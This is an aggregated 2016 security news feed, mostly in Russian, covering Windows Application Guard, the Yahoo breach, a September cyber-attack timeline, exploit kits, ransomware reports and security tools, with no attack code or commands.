Модуль предназначен для организации управления ИТ-активами, сбора и визуализации детальной информации об ИТ-инфраструктуре и связях между элементами этой инфраструктуры, осуществления контроля за состоянием инфраструктуры.

orig: 2016-09-28 14:45:05 / https://rvision.pro/blog-posts/programmnyj-kompleks-tsentr-kontrolya-informatsionnoj-bezopasnosti-r-vizhn-vnesen-v-reestr-rossijskogo-po/ (click post title)

Microsoft ранее уже анонсировала специальные защитные меры от вредоносного ПО и кибератак, которые основаны на механизме виртуализации Hyper-V. С выпуском Windows 10 компания представила так называемую среду Virtual Secure Mode (VSM) и две основанные на VSM защитные меры: Device Guard и Credential Guard (доступны для enterprise версий Windows 10). Основное их предназначение заключается в изоляции критических для безопасности операций в мини-ОС, которая работает в отдельной виртуальной машине с высоким уровнем доверия.
К таким критическим операциям относится проверка легитимности данных UEFI-прошивки компьютера, драйверов режима ядра (Device Guard) и выполнение процедур, которые относятся к аутентификации пользователей (Credential Guard). Новая функция безопасности под названием Windows Defender Application Guard для веб-браузера Edge выполняет аналогичную изоляцию на основе Hyper-V, но только, в этом случае, ненадежных источников контента в веб-браузере.

Ниже на рисунке представлена архитектура VSM, которая основана Hyper-V. Схожую архитектуру использует и App Guard.

Как видно выше, основная копия Windows 10 (хост) отделена от VSM изоляцией на уровне гипервизора. Схожий подход применяет и App Guard для Edge. Когда пользователь посещает недоверенный веб-сайт в браузере, он открывается не в контексте виртуальной машины хоста, а в другой, которая создана именно для таких потенциально опасных операций как просмотр контента на небезопасных веб-сайтах....when an employee browses to a site that is not recognized or trusted by the network administrator, Application Guard steps in to isolate the potential threat. Application Guard creates a new instance of Windows at the hardware layer, with an entirely separate copy of the kernel and the minimum Windows Platform Services required to run Microsoft Edge. The underlying hardware enforces that this separate copy of Windows has no access to the user’s normal operating environment.

Таким образом, если злоумышленник планирует кибератаку на сотрудников организации и использует для этого фишинговую ссылку, которая может использоваться для организации атаки типа drive-by download, она будет открыта в изолированном на уровне гипервизора окружении. В таком контексте исполнения атакующий не сможет получить для себя никакой новой информации, поскольку в этой виртуальной машине ограничен доступ к любой информации пользователя, располагающейся на хосте. При этом для самого пользователя Edge будет создаваться ощущение, что процесс вкладки работает в системе хоста.

Windows Defender Application Guard для веб-браузера Edge станет доступна пользователям копий Windows программы Insiders в ближайшие месяцы, а для пользователей релизных копий Windows 10 Enterprise в следующем году.

Windows Defender Application Guard for Microsoft Edge will become available to Windows Insiders in the coming months, and roll out more broadly next year.

orig: 2016-09-28 14:21:54 / https://habrahabr.ru/post/311242/ (click post title)

Пока Yahoo продолжает расследование самой крупной утечки в истории, компанию призывают уточнить, как давно она знала об утечке и как долго держала информацию об этом в секрете, а также пояснить, каким образом шифруются данные пользователей.

ИБ-компания Venafi заявила, что проанализировала данные о состоянии криптографических ключей и цифровых сертификатов Yahoo, полученные при помощи собственного сервиса проверки сертификатов. В результате в средах Yahoo были обнаружены устаревшие алгоритмы хеширования и самоподписанные, а не выданные независимой организацией сертификаты.

На прошлой неделе Yahoo сообщила, что в 2014 году подверглась атаке, в результате которой были похищены полмиллиарда учетных записей. В атаке компания подозревает спецслужбы неизвестной принадлежности. Злоумышленники смогли украсть информацию об именах пользователей, их email-адресах, телефонных номерах, датах рождения, резервных email-адресах и проверочных вопросах для восстановления пароля. Также были скомпрометированы хешированные пароли, что особенно беспокоит в свете нескольких крупных утечек в этом году: киберпреступникам прекрасно известно, что пользователи имеют обыкновение использовать один и тот же пароль для нескольких сервисов.

Источник, знакомый с обстоятельствами расследования, утверждает, что большинство паролей были хешированы при помощи алгоритма bcrypt, как и сообщила Yahoo, но некоторая их часть была хеширована при помощи уже устаревшего и считающегося уязвимым алгоритма MD5.

Yahoo принудительно сбросила пароли всех аккаунтов, пострадавших в результате утечки, а также рекомендовала незамедлительно изменить пароли всем, кто не делал этого с 2014 года. Пока неизвестно, насколько глубоко смогли проникнуть взломщики в инфраструктуру Yahoo; ряд экспертов связывают атаку на Yahoo с атаками Aurora на Google и несколько других крупных организаций и ИТ-компаний в 2009–2010 годах. В причастности к кампании Aurora подозревают китайскую APT-группировку, которая, как считают, охотилась за исходным кодом компаний-жертв с целью его модификации.

Тем временем стало известно о нескольких групповых исках, поданных пользователями Yahoo. Истцы считают, что Yahoo халатно отнеслась к защите пользовательских данных. В статье Financial Times говорится, что глава компании Марисса Майер (Marissa Mayer) еще в июле знала, что Yahoo расследует потенциально крупную утечку, и, как пишут журналисты, начала этим заниматься еще до появления сведений об обнаружении на черном рынке 200 млн скомпрометированных аккаунтов Yahoo.

Тем не менее Майер не торопилась сообщать о расследовании в компанию Verizon, собравшуюся выкупить основной бизнес Yahoo за $4,8 млрд, и не упомянула о нем в квартальном отчете, недавно поданном в Комиссию по ценным бумагам (SEC). В итоге Verizon узнала о масштабной утечке в Yahoo лишь на прошлой неделе, на 10 дней позже, чем SEC; рапортуя комиссии о текущем расследовании, Майер от имени Yahoo заявила, что сведений о нарушении безопасности или проникновении в системы у компании нет. По данным Financial Times, комиссия может начать свое собственное расследование по утечке в Yahoo.

В анализе, опубликованном Venafi, ситуация с протоколами и политиками шифрования в Yahoo выглядит неутешительно. Yahoo не комментирует результаты этого исследования.

Venafi, в частности, указала, что в использовании сертификатов MD5 имеются систематические проблемы; многие из сертификатов Yahoo самоподписаны. Один из проанализированных сертификатов MD5 является универсальным, со сроком действия пять лет (большинство сертификатов истекают в течение 12–18 месяцев после выпуска). В Venafi говорят, что 27% сертификатов на внешних сайтах Yahoo действуют с января 2015 года и только 2,5% были выпущены в течение последних полутора месяцев.

Также почти половина (41%) активных сертификатов внешних сайтов Yahoo используют алгоритм хеширования SHA-1, который, как и MD5, постепенно выводится из обращения всеми основными вендорами браузеров.

Venafi, вероятно, не может быть полностью объективной в расследовании инцидента: она является разработчиком технологии защиты криптоключей и цифровых сертификатов; представители компании, однако, заверили, что не были осведомлены о расследовании в Yahoo при подготовке своего исследования.

Очевидная уязвимость защиты может быть результатом недостаточной осведомленности компании о безопасности собственной инфраструктуры и слишком жестко централизованных процессов управления политиками шифрования, сказали в Venafi. В компании также отметили, что из-за масштабов своей инфраструктуры Yahoo не способна быстро локализовать и исправить проблемы защиты и обновления сертификатов.

Теоретически противник, имеющий достаточные ресурсы, способен воспользоваться слабостями Yahoo, то есть применить самоподписанный сертификат Yahoo и слить украденные данные из Сети, а также выдать себя за легитимную структуру Yahoo и перехватывать трафик.

«Теоретически возможно, что обладающий ресурсами взломщик мог использовать самоподписанный сертификат Yahoo или произвольный, самостоятельно выпущенный сертификат, — уточнил Хари Наир (Hari Nair), исследователь-криптограф в Venafi. — Такие сертификаты можно было потенциально использовать для установки соединения с организацией, и, если к контролю сертификатов относятся спустя рукава, хакеры могли сделать свое дело и исчезнуть незамеченными».

Наир сказал, что контроль за ключами и сертификатами — не единственный способ распознать вывод данных; однако атакованная организация может воспринимать любой сертификат, не выписанный утвержденной Yahoo сертифицирующей организацией, как индикатор компрометации (IoC).

Цифровые сертификаты обычно выполняют две основные функции: они подтверждают, что сайт является тем ресурсом, за который себя выдает, а также шифруют данные. Если организация не может обеспечить контроль за выдачей, сроком действия и сверкой сертификатов, то она не способна обеспечить и адекватный уровень безопасности.

«Зрелые организации контролируют свои криптографические активы на высоком уровне. Так гораздо легче распознать просроченные или поддельные сертификаты и своевременно предупредить ИБ-отдел об этом, — сказал Наир. — Организации нужно быть начеку, кроме тех случаев, когда сертификаты выпущены утвержденной сертифицирующей организацией. Если нет определенного механизма установления доверия, нет гарантий, что никто не воспользуется этим беспорядком».

orig: 2016-09-28 14:14:42 / https://threatpost.ru/masshtabnyj-vzlom-yahoo-vyzyvaet-vse-bolshe-voprosov/18357/ (click post title)

Состоялся финальный бета-выпуск дистрибутива Ubuntu 16.10 "Yakkety Yak". Готовые тестовые образы созданы для Ubuntu, Ubuntu Server и Kubuntu (для них на прошлых этапах тестирования предлагались только ежедневные сборки), а также для Ubuntu GNOME, Ubuntu Studio, Lubuntu, Ubuntu MATE и UbuntuKylin (редакция для Китая). Релиз Ubuntu 16.10 запланирован на 13 октября.

orig: 2016-09-28 14:10:54 / http://www.opennet.ru/opennews/art.shtml?num=45234 (click post title)

King Servers принадлежат шесть из восьми IP-адресов, использовавшихся к атаках на избиратеьные системы США.

Владелец российской компании King Servers Владимир Фоменко не подозревал, что принадлежащие ему сданные в аренду серверы использовались для кибератак на избирательные системы США. Об этом сообщает «РИА Новости» со ссылкой на источники в правоохранительных органах Алтайского края.

Как ранее заявили американские специалисты по кибербезопасности, King Servers являлась владельцем шести из восьми IP-адресов, обнародованных ФБР в связи с расследованием инцидента. Данный факт приводился в качестве одной из причин, указывающих на связь кибератак с Россией.

По словам источника, чаще всего King Servers арендует серверы на анонимной основе. Так произошло и в данном случае. Фоменко готов предоставить IP-адреса, интернет-протоколы и другие сведения, однако пока сотрудники спецслужб США не обращались к нему по данному поводу, отмечает собеседник агентства.

orig: 2016-09-28 14:08:36 / http://www.securitylab.ru/news/483964.php (click post title)

Autumn is here! And unluckily its winds were not strong enough to sweep off the trail of mega breaches that are really the most remarkable infosec trends of this troubled 2016. Yes, it’s true, this timeline covers only the first two weeks of September and apparently the number of attacks decreased in comparison with the previous two months, however the damage report includes 100 million accounts from Rambler.ru, 43 million from Last.fm, 33 million from QIP.ru, and 2.2 million from ClixSense. Is this enough? Unfortunately not (ask to Yahoo!).

Other remarkable events include the hack of the World Anti-Doping Agency (WADA) by the infamous APT28 (AKA Fancy Bear) with the consequent leak of sensitive data on athletes, and the massive DDoS against Linode.

As usual, if you want to have an idea of how fragile our electronic identity is inside the cyberspace, have a look at the timelines of the main Cyber Attacks in 2011, 2012, 2013, 2014, 2015 and, in a bit, 2016 (regularly updated). You may also want to have a look at the Cyber Attack Statistics that are regularly published, and follow @paulsparrows on Twitter for the latest updates.

Last but not least, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts), and if useful, you can access the timeline in Google Sheet format:

ID	Date	Author	Target	Description	Attack	Target Class	Attack Class	Country
1	01/09/2016	?	Last.fm	More than 43 million of user records from UK-based music streaming service Last.fm surfaced from a hack that occurred in 2012. Each record reportedly contains a username, email address, hashed password and profile data.	Unknown	Online Music	CC	UK
2	01/09/2016	APT3	2 Hong Kong Government Agencies.	Security company FireEye reveals that two Hong Kong government agencies have come under attack from cyberspies originating in China in the month leading up to Sunday’s legislative elections.	Targeted Attack	Government	CE	HK
3	01/09/2016	?	Btc-E.com	LeakedSource reveals that Btc-E.com had 568,355 users hacked in October of 2014. Data contains usernames, emails, passwords, ip addresses, register dates, languages and some internal data such as how many coins the user had.	Unknown	Bitcoin Exchange	CC	US
4	01/09/2016	?	Bitcointalk.org	LeakedSource reveals that Bitcointalk.org had 499,593 users hacked in May of 2015. Data contains usernames, emails, passwords, birthdays, secret questions, hashed secret answers and some other internal data.	Unknown	Online Forum	CC	US
5	01/09/2016	?	University of New Mexico	Over 1,000 former students and employees of UNM have their identity stolen from a University database. After a month of silence, UNM establishes a call center to assist victims of the incident.	Unknown	Education	CC	US
6	01/09/2016	?	Transmission BitTorrent Client	Developers of the Transmission BitTorrent client admitted that hackers replaced downloads of its file-sharing software with trojanized code. The hack, detected within hours, was designed to spread a Mac OS X backdoor, Kidnap, which steals user credentials. It’s unclear how many people were affected.	Account Hijacking	Org: Software	CC	US
7	01/09/2016	Ghost Squad Hackers (GSH)	12 websites belonging to the Afghan government	Hacktivist group Ghost Squad Hackers (GSH) defaced 12 websites belonging to the Afghan government.	Defacement	Government	H	AF
8	01/09/2016	Expl.oit AKA Exploit	exilemod.com	A group of hackers going by the online handle of “Expl.oit” or “Exploit” hack the official website of Exile Mod gaming forum and leaks personal details of 11,902 registered users.	SQLi	Online Forum	CC	DE
9	01/09/2016	?	manaliveinc.org	The non-profit organization Man Alive is hacked, and a patient database with sensitive personal and treatment information is put up for sale on the dark web.	Unknown	Org: Non-Profit	CC	US
10	01/09/2016	websites-hunter AKA @websitehunter	Al Zahra Private Medical Centre (alzahra.com)	The Al Zahra Private Medical Centre is hacked by an individual calling himself websites-hunter, who dumps the database online.	Unknown	Healthcare	CC	UAE
11	02/09/2016	?	Linode	Linode reports the first of a series of DoS attacks on September 2nd, September 4th and September 5th. Another round will strike the company on Saturday, September 10th. Some of the attacks lasted up to eight hours.	DDoS	Industry: Hosting Provider	CC	US
12	02/09/2016	?	Hutton Hotel	Hutton Hotel reports a breach of its payment card system warning guests that their information may have been compromised	Malware	Industry: Hotel and Hospitality	CC	US
13	02/09/2016	Anti-Armenia Team	Armenian Government	Azerbaijani hacktivists from Anti-Armenia Team leak the passport details of foreign visitors to Armenia and more after breaking into Armenian government servers.	Unknown	Government	H	AM
14	02/09/2016	?	Lightspeed	Point of sales vendor Lightspeed is breached with password, customer data, and API keys possibly exposed, and notifies customers in an email saying that the information was contained in a compromised database	Unknown	Industry: Software	CC	CA
15	03/09/2016	OurMine	Variety	Entertainment news site Variety is briefly taken over by the infamous hacker group OurMine. The hacking collective manages to break into Variety's content management system and defaces the site with a post of their own claiming responsibility for the attack. The group also floods the site's email subscribers' inboxes with dozens of identical emails	Account Hijacking	News	CC	US
16	03/09/2016	Spain Squad	Twitter	A group of hackers dubbed Spain Squad claims to have found a way to seize inactive and suspended Twitter accounts, and sells them on the social network.	Unknown Vulnerability	Social Media	CC	US
17	03/09/2016	Myrotvorets	Ukrainian alleged pro-Russian Journalists	Myrotvorets, a group of Ukrainian nationalist hackers, leaks the personal details of local journalists they consider pro-Russian for the second time in four months.	Account Hijacking	Single Individuals	H	UA
18	05/09/2016	?	Brazzers	Nearly 800,000 accounts for popular porn site Brazzers have been exposed in a data breach	Unknown	Adult Site	CC	US
19	06/09/2016	DayKalif	Rambler.ru	Nearly 100 million usernames and passwords from the Russian internet giant Rambler surface online in the latest in a long line of hacks that first occurred back in 2012.	Unknown Vulnerability	Industry: Internet Services	CC	RU
20	06/09/2016	?	University of Alaska	University of Alaska officials announces that an attacker using employee credentials may have accessed student information of approximately 5,400 individuals.	Account Hijacking	Education	CC	US
21	07/09/2016	North Korea?	Project on Crowdsourced Imagery Analysis (geo4nonpro.org)	Servers belonging to the Project on Crowdsourced Imagery Analysis (PCIA), hosting data about nuclear tests, have been the subject of DDoS attacks just two days before North Korea's most recent nuclear tests.	DDoS	Org: Non-Profit	CW	US
22	07/09/2016	Aslan Neferler Tim or Lion Soldiers Team	Vienna Airport	Austrian police investigates a failed cyberattack on Vienna's airport saying they are looking into the authenticity of a claim of responsibility from a Turkish nationalist group.	Unknown	Airport	H	AT
23	07/09/2016	?	Hutton Hotel	The Hutton Hotel says it engaged a third-party cyber security firm after it was notified of a possible breach by its payment processor. The investigation found that malware designed to capture card data had been installed on the hotel's payment processing system.	PoS Malware	Industry: Hotel and Hospitality	CC	US
24	08/09/2016	?	EurekAlert! (eurekalert.org)	Popular science website EurekAlert!, which handles embargoed reports on health, medicine, and technology is hacked. The announcement in the website states that usernames and passwords to the service have been compromised. The hacker has also leaks two embargoed reports.	Unknown	News	CC	US
25	08/09/2016	?	vDoS	vDos, a “booter” service that has earned in excess of $600,000 over the past two years helping customers coordinate more than 150,000 DDoS attacks is massively hacked, spilling secrets about tens of thousands of paying customers and their targets.	Unknown Vulnerability	DDoS-for-hire	CC	IL
26	08/09/2016	?	libero.it	The database of the Italian portal libero.it is leaked online (about 750,000 users).	Unknown	Industry: ISP	CC	IT
27	09/09/2016	?	VoIpTalk	Telephony provider VolPtalk may have been hit by hackers. The firm discreetly informs customers about a potential data breach and request to reset their passwords as a precautionary measure.	Unknown	Industry: Telephony	CC	UK
28	09/09/2016	?	KrebsOnSecurity	Security researcher Brian Krebs' website KrebsOnSecurity comes under "heavy and sustainable" attack after two 18 year-old Israeli hackers were arrested over their connection with a DDoS-for-hire service called vDOS.	DDoS	News	CC	US
29	09/09/2016	Aslan Neferler Tim or Lion Soldiers Team	Austrian National Bank (OeNB.at)	Turkish hackers have launched DoS (Denial-of-Service) attacks against the web servers of the Austrian National Bank (OeNB).	DDoS	Government	H	AT
30	09/09/2016	?	Almelo.nl	Hackers steal 22 gigabytes of data from municipal servers in Almelo	Unknown	Government	CC	NL
31	10/09/2016	Daykalif	QIP.ru	QIP.ru is the latest organization to join the list of companies hit by mega breaches. A hacker dubbed daykalif dumps a trove of 33 million accounts.	Unknown	Industry: Software	CC	RU
32	11/09/2016	B0yzTeam	Bremerton Housing Authority (bremertonhousing.org)	A group of cyber criminals defaces the official website of Bremerton Housing Authority (bremertonhousing.org) and demands $4,000 as ransom.	Defacement	Org: Housing	CC	US
33	13/09/2016	APT28 AKA Fancy Bear	World Anti-Doping Agency (Wada)	The World Anti-Doping Agency (Wada) confirms that a suspected Russian hacking group illegally accessed its 'administration and management system' - known as 'Adams' and stole troves of sensitive data on athletes. Among those targeted are Serena and Venus Williams, gymnast Simone Biles, and American basketball star Elena Delle Donne. Compromised information includes confidential medical data, such as Therapeutic Use Exemptions,	Account Hijacking	Org: Sport	CC	N/A
34	13/09/2016	?	ClixSense	Plaintext passwords, usernames, e-mail addresses, and other personal information for more than 2.2 million people who created accounts with ClixSense are published online. The attackers claim to release additional 4.4 million accounts.	Unknown	Pay-per-click	CC	US
35	13/09/2016	?	Thousands of Seagate NAS	Thousands of Seagate Central network-attached storage (NAS) devices have been found hosting cryptocurrency mining malware called Miner-C which turns them into repositories to infect other devices.	Malware	Single Individuals	CC	>A
36	14/09/2016	?	St. Francis Health System	St. Francis Health System is hacked and the data is sold on the Dark Web for 24 BTC (14,500 USD, 11,000 GBP, 13,000 EUR)	Unknown	Healthcare	CC	US
37	14/09/2016	?	Empireminecraft.com	Empireminecraft notifies its users of the compromise of one of the staff member's email account. As a result the attacker was able to access confidential information.	Account Hijacking	Online Forum	CC	US
38	15/09/2016	MuslimLeets (aka Muj4hida)	American Human Rights Council (AHRC.org) and 62 other websites	A hacker going by the name MuslimLeets (aka Muj4hida) defaces the American Human Rights Council (AHRC) and 62 other websites, leaving a message calling for jihad.	Defacement	Org: Non-Profit	H	US

Like Loading...

orig: 2016-09-28 13:34:18 / http://www.hackmageddon.com/2016/09/28/1-15-september-2016-cyber-attacks-timeline/ (click post title)

Злоумышленники применяют технику, использованную в ходе операции Aurora.

Специалисты компании Carbon Black зафиксировали новую вредоносную рекламную кампанию, в ходе которой злоумышленники используют сложную технику обфускации аналогичную примененной в рамках операции Aurora.

Напомним, в январе 2010 года компания Google сообщила о серии кибератак на сервис электронной почты Gmail. Атаки осуществлялись с территории Китая и были направлены не только на Google, но и другие крупные технокомпании, включая Adobe Systems, Juniper Networks и Rackspace. Предположительно, целью злоумышленников являлась интеллектуальная собственность предприятий.

По словам эксперта Carbon Black Бенджамина Тедеско (Benjamin Tedesco), в ходе новой кампании атакующие используют рекламное ПО, такое как OpenCandy, Dealply и троянизированную версию Chromium для распространения вымогателя Enigma и другого вредоносного ПО. Для уклонения от обнаружения применяется техника обфускации, предполагающая создание файлов с необычными расширениями.

orig: 2016-09-28 13:13:48 / http://www.securitylab.ru/news/483963.php (click post title)

Вышла новая версия Cyber Security Evaluation Tool и рекомендации по улучшению киберзащиты АСУ.

Компьютерная группа реагирования на чрезвычайные ситуации в АСУ (ICS-CERT) опубликовало обновленные версии двух своих инструментов, предназначенных для усиления безопасности промышленных систем управления. Эксперты выпустили новую версию инструмента Cyber Security Evaluation Tool (CSET) и рекомендации по улучшению киберзащиты АСУ, распространяющиеся бесплатно.

Рекомендации обновляются на регулярной основе, и прошлая была выпущена в 2009 году (текущая версия рекомендаций – 8.0). CSET  представляет собой ПО для настольных компьютеров, позволяющее операторам АСУ шаг за шагом улучшить практики безопасности своих информационных сетей и систем управления.

В процессе работы CSET задает вопросы о компонентах системы, архитектуре, операционных политиках и процедурах и т.д. Вопросы зависят от того, каким примышленным и государственным стандартам должны соответствовать АСУ. По завершении опроса на монитор выводится панель графиков, демонстрирующих все защищенные и незащищенные места в системе, а также соответствующие рекомендации для усиления кибербезопасности.

orig: 2016-09-28 12:55:51 / http://www.securitylab.ru/news/483962.php (click post title)

После нескольких месяцев разработки состоялся релиз программы Severcart 0.4.0, предназначенной для управления жизненным циклом расходных материалов для офисной оргтехники, в том числе картриджей для лазерных и струйных принтеров различных производителей. Предоставляемый программой интерфейс позволяет планировать закупку расходных материалов, отслеживать оставшиеся ресурсы, вести историю перезаправок, генерировать отчётность, печатать акты передачи на заправку и формировать договоры поставки. Программа написана на Python 3 с использованием фреймворка Django и СУБД PostgreSQL. Код программы распространяется под лицензией GPLv2.

orig: 2016-09-28 11:47:53 / http://www.opennet.ru/opennews/art.shtml?num=45233 (click post title)

Вендор Fortinet при поддержке дистрибьюторов Marvel и Netwell провел вчера в Digital October своё второе масштабное мероприятие в России под общим названием Fortinet Security Day (отзыв про 2015 год можно прочитать тут), в котором мне довелось принять участие в качестве посетителя и (внезапно и незапланированно) даже спикера.

Субъективно, в этом году посетителей было ещё больше, чем год назад: зал был полон, при этом в коридорах тоже шло активное общение между участниками.

Зал на Fortinet Security Day 2016 (фото Михаил Родионов)

Открывалось мероприятие по традиции вводной секцией в режиме свободного общения экспертов (Андрей Прозоров и Максим Степченков) с залом, к коллегам присоединился Алексей Андрияшин из Fortinet и сюрприз-сюрприз принять участие в дискуссии пригласили и меня. Не люблю выступать экспромтом и без подготовки, но, как говорится, если всё время отказываться, перестанут предлагать =)

Сцена на Fortinet Security Day 2016 во время водной дискуссии (фото Эдуард Голубкин)

Лично мне со сцены казалось, что вводная сессия какая-то затянутая, но под конец завязался интересный диалог с представителем Сбербанка, который, рассказывая о тех мерах по ИБ, которые у них принимаются, и говоря о тех инициативах, в которых они участвуют, фактически, сделал своей организации неплохую рекламу.

Дальше всё пошло (опять же, на мой взгляд) поживее, правда, тайминг не соблюдался абсолютно и в отдельные моменты сдвиг доходил до 50 минут. К концу дня, впрочем, как это обычно и бывает, всё выровнялось.

Начальные дообеденные презентации мне особенно понравились и я достаточно много делал постов в Твиттер с тегом #FortinetSecurityDay, часть из них дублировал в Facebook, где порой разворачивалось оживлённое обсуждение с участием представителей других вендоров по сетевой безопасности — можно поискать по такому же тегу #FortinetSecurityDay, по некоторым обсуждениям можно отдельные посты сделать, а то и парочку =)

В Твиттере традиционно активен был и Андрей Прозоров, начавший в какой-то момент постить почти все слайды подряд с очень короткими, а то и вовсе без комментариев.

Пулеметный метод твиттинга от Андрея Прозорова

В итоге боты приняли его за своего и начали активно за ним повторять =) Особенно им понравился твит: «Решение FortiSandbox, кстати, очень хорошо!!! #FortinetSecurityDay» — я насчитал с дюжину твитов.

Боты повторяют за Андреем Прозоровым

Закономерным итогом стало то, что тег #FortinetSecurityDay был жестоко заспамлен всякой ерундой, так что прокручивайте сильно ниже, если будете твиты по этому тегу смотреть.

Наверное, нет смысла пересказывать все презентации, которые удалось послушать (надеюсь, они будут доступны, как и прошлом году, дополню тогда этот пост ссылкой), приведу, пожалуй, только основные слайды из доклада Дмитрия Соболева из ЗАО «НИЦ» про «Основные аспекты сертификации решений компании Фортинет».

Кто есть кто в рамках сертификации

Что сегодня происходит с сертификацией Fortinet

На что сертифицируется Fortinet

Fortinet может стать первым, кто сертифицируется по новым требованиям к МЭ

ЗАО НИЦ планирует обеспечить задержку для публикации обновлений сигнатур для Fortinet на доверенном ресурсе не более нескольких минут

Если пересказать кратко, то ЗАО «НИЦ» является заявителем на сертификацию решений Fortinet, испытательной лабораторией выбрана компания Документальные системы, а органом по сертификации — ФАУ ГНИИПТЗИ. Первоначальное положительное решение о сертификации девяти аппаратных и одной виртуальной платформы FortiGate было получено ещё до утверждения новых требований ФСТЭК к межсетевым экранам, но так как пока (есть надежда, что передумают) ФСТЭК намерен с 01 декабря ограничить в том числе и поставку сертифицированных межсетевых экранов, не соответствующих новым требованиям:

«с 1 декабря 2016 г. разрабатываемые, производимые и поставляемые межсетевые экраны должны соответствовать Требованиям», —

то коллеги из ЗАО «НИЦ» идут и по пути сертификации в соответствии с новыми правилами игры, ну, а так как они новые, то и вопросов возникает на практике масса. В частности, вопрос с тем, как организовать доверенную загрузку обновлений сигнатур (а не только обновлений самого программного обеспечения)? По словам Дмитрия Соболева сейчас прорабатывается несколько вариантов и есть надежда, что даже при худшем варианте задержка в обновлении сигнатур для сертифицированных FortiGate не будет превышать нескольких минут по сравнению с обычными.

В заключение, пожалуй, не могу ещё не упомянуть небольшой курьёз: докладчик из VMware, рассказывая про интеграцию решений Fortinet с VMware NSX, оговорился и сказал «Check Point».

Оговорочка

Коллеги рассказывали, что, вроде бы, он обещал взамен на двух последующих мероприятиях вместо Check Point упомянуть Fortinet =) Но, может, просто шутили. Атмосфера на мероприятии царила дружеская и было приятно в том числе просто пообщаться с коллегами, тем более что Infosecurity на прошлой неделе пропустил (по объективным причинам).

orig: 2016-09-28 11:46:04 / http://feedproxy.google.com/~r/zlonov/~3/_bETfH_OubA/ (click post title)

Вредонос был обнаружен накануне дебатов Хилари Клинтон и Дональда Трампа.

Исследователь безопасности Лоуренс Абрамс (Lawrence Abrams) обнаружил вымогательское ПО Donald Trump, в настоящее время находящееся на стадии разработки. Вредонос был впервые скомпилирован более месяца назад и, возможно, не будет использоваться вовсе.

В Donald Trump предусмотрена функция шифрования файлов с помощью алгоритма AES, однако текущая версия пока не способна что-либо шифровать. Вместо этого она ищет  файлы в папке encrypt и шифрует их имена и добавляет расширение .ENCRYPTED.  В текущей версии для расшифровки файлов достаточно нажать на кнопку.

Абрамс обнаружил вредонос накануне первых дебатов Хилари Клинтон и Дональда Трампа, проходивших 26 сентября нынешнего года. Из любопытства исследователь решил поискать образцы вредоносного ПО, посвященного кандидатам в президенты США. Абрамс не нашел ничего, связанного с Клинтон, однако обнаружил находящееся на стадии разработки вымогательское ПО, названное в честь ее оппонента.

orig: 2016-09-28 11:36:50 / http://www.securitylab.ru/news/483961.php (click post title)

Have you ever wanted to go back in time to get a PCAP of something strange that just happened on a PC?
I sure have, many times, which is why we are now releasing a new tool called PacketCache. PacketCache maintains a hive of the most important and recent packets, so that they can be retrieved later on, if there is a need.

Network forensics and incident response is performed post-event, but requires that packet have already been captured during the event to be analyzed. Starting a network sniffer after a suspected intrusion might provide useful insight on what the intruders are up to, but it is much better to be able to go back in time to observe how they gained access to the network and what they did prior to being detected. Many companies and organizations combat this problem by setting up one or several solutions for centralized network packet capturing. These sniffers are typically installed at choke-points on the network, such as in-line with a firewall. However, this prevents the sniffers from capturing network traffic going between hosts on the same local network. Intruders can therefore often perform lateral movement on a compromised network without risk getting their steps captured by a packet sniffer.

We're now trying to improve the situation for the defenders by releasing PacketCache, which is a free (Creative Commons licensed) Windows service that is designed to continuously monitor the network interfaces of a computer and store the captured packets in memory (RAM). PacketCache monitors all IPv4 interfaces, not just the one connected to the corporate network. This way traffic will be captured even on public WiFi networks and Internet connections provided through USB broadband modems (3G/4G).

By default PacketCache reserves 1% of a computer's total physical memory for storing packets. A computer with 4 GB of RAM will thereby allow up to 40 MB of packets to be kept in memory. This might not seem like much, but PacketCache relies on a clever technique that allows it to store only the most important packets. With this technique just 40 MB of storage can be enough to store several days worth of “important” packets.

The “clever technique” we refer to is actually a simple way of removing packets from TCP and UDP sessions as they get older. This way recent communication can be retained in full, while older data us truncated at the end (i.e. only the last packets are removed from a session).

To download PacketCache or learn more about this new tool, please visit the official PacketCache page: https://www.netresec.com/?page=PacketCache

PCAP or it didn't happen!

 Share on Facebook

 Tweet

 Submit to reddit.com

orig: 2016-09-28 11:17:13 / http://www.netresec.com/?page=Blog&month=2016-09&post=PacketCache-lets-you-Go-Back-in-Time (click post title)

RIG не только заменил Neutrino во вредоносных кампаниях, но и позаимствовал фрагмент исходного кода последнего.

Исследователи ряда компаний, специализирующихся на информационной безопасности, сообщают об изменениях в ландшафте киберугроз. В частности, в сентябре нынешнего года возросла активность набора эксплоитов RIG, сместившего эксплоит-кит Neutrino с лидирующей позиции.

По словам специалиста компании Malwarebytes Джерома Сегуры (Jerome Segura), после прекращения работы набора Angler в июне 2016 года, его место занял Neutrino, который злоумышленники использовали в различных масштабных вредоносных кампаниях. После того, как специалисты Cisco Talos и GoDaddy совместными усилиями пресекли несколько таких кампаний, популярность Neutrino значительно снизилась.

Как оказалось, RIG не только заменил Neutrino во вредоносных кампаниях, но и позаимствовал фрагмент исходного кода последнего. Для доставки эксплоитов на компьютер жертвы Neutrino использовал процесс wscript.exe. Этот метод стал «визитной карточкой» Neutrino, пояснил Сегура. Однако в начале сентября RIG также начал использовать процесс wscript.exe вместо iexplore.exe. Кроме того, специалисты Heimdal Security зафиксировали вредоносную кампанию, в ходе которой злоумышленники использовали RIG для распространения вымогательского ПО CrypMIC.

По данным компании Digital Shadows, в настоящее время RIG остается одним из пяти активных эксплоит-паков на рынке, наряду с Neutrino, Magnitude, Sundown и менее известным Hunter.

orig: 2016-09-28 11:06:49 / http://www.securitylab.ru/news/483965.php (click post title)

По словам «Anonymous 13», им удалось взломать  аккаунты 40% всех армянских пользователей соцсети.

Кибервойна между армянскими и азербайджанскими хакерами продолжается. После публикации армянской группировкой Monte Melkonian Cyber Army информации предположительно о 1200 азербайджанских офицерах, ее противники не заставили себя долго ждать. Спустя несколько дней азербайджанская группировка, называющая себя «Anonymous 13», нанесла ответный удар.

По словам хакеров, им удалось взломать 10 тыс. принадлежащих армянам учетных записей в Facebook. 10 тыс. – это 40% от всех пользователей соцсети в Армении. Злоумышленники опубликовали часть похищенной информации (пароли, электронные адреса и номера телефонов) в открытом доступе и заявили о намерении похитить данные кредитных карт.

Напомним, в начале текущего месяца азербайджанская хакерская группировка Anti-Armenia Team заявила об успешном взломе сервера Министерства обороны Республики Армения. Злоумышленники похитили и опубликовали паспортные данные въехавших в страну иностранных граждан.

orig: 2016-09-28 10:46:21 / http://www.securitylab.ru/news/483960.php (click post title)

